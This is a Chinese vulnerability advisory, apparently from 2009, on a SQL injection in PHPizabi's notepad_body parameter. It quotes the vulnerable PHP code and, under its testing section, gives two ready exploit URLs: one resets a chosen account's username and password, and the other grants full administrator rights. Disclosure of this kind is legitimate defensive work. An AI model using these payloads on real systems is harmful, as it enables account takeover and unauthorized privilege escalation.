安全研究

安全漏洞
PHPizabi notepad_body参数SQL注入漏洞

发布日期:2009-03-24
更新日期:2009-03-25

受影响系统:
Real!ty Medias PHPizabi v0.848b C1 HFP1
描述:
BUGTRAQ  ID: 34223

PHPizabi是一款代码开源的在线交友、交流、婚介、商务合作系统。

PHPizabi的/theme/default/proc.inc.php模块中没有正确地验证用户所提交的notepad_body参数,远程攻击者可以通过提交恶意的查询请求执行SQL注入攻击。以下是有漏洞的代码段:

<?php

    function bufferProcParse($buffer) {
        global $CONF;
        
        $tpl = new template;
        $tpl -> LoadThis($buffer);
        // HANDLE POSTED NOTEPAD DATA \
///////////////////////////////////////////////////////  if \
(isset($_GET["notepad_body"])) {  myQ("UPDATE `[x]users` SET `notepad_body` = \
'".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");  me("flush");
        }
..

<*来源:bookoo
  
  链接:http://marc.info/?l=bugtraq&m=123791015512629&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%
http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/*

建议:
厂商补丁:

Real!ty Medias
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.phpizabi.net/?L=home.index

浏览次数:12823
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障